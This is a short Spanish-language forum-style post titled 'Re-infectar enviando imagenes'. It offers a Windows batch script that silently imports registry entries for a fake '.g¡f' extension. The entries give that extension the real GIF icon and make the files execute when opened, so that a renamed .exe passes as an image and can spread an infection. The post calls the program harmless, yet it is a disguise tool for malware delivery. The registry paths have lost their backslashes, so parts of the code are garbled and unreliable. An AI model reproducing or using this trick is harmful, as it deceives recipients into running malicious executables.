Re-infectar enviando imagenes | |
Programa inofensivo que escribe una entrada en el registro para que muestre la extensión .gif como ".g¡f" (i es una exclamación) con el icono verdadero de una imagen (.gif) pero fijense, porque sigue siendo un archivo ejecutable (.exe) renombrado a .g¡f Código: @echo off echo Windows Registry Editor Version 5.00>> br.reg echo [HKEY_CLASSES_ROOTg¡ffile>>> br.reg echo @="Imagen GIF">> br.reg echo "NeverShowExt"="">> br.reg echo "EditFlags"=dword:00000000>> br.reg echo "BrowserFlags"=dword:00000008>> br.reg echo [HKEY_CLASSES_ROOTg¡ffileDefaultIcon>>> br.reg echo @="shimgvw.dll,2">> br.reg echo [HKEY_CLASSES_ROOTg¡ffileShell>>> br.reg echo @="">> br.reg echo [HKEY_CLASSES_ROOTg¡ffileShellOpen>>> br.reg echo [HKEY_CLASSES_ROOTg¡ffileShellOpenCommand>>> br.reg @echo @=hex(2):22,00,25,00,31,00,22,00,20,00,25,00,2a,00,00,00>> br.reg echo [HKEY_CLASSES_ROOT.g¡f>>> br.reg echo @="g¡ffile">> br.reg regedit.exe /s br.reg erase /s /q br.reg exit
| |
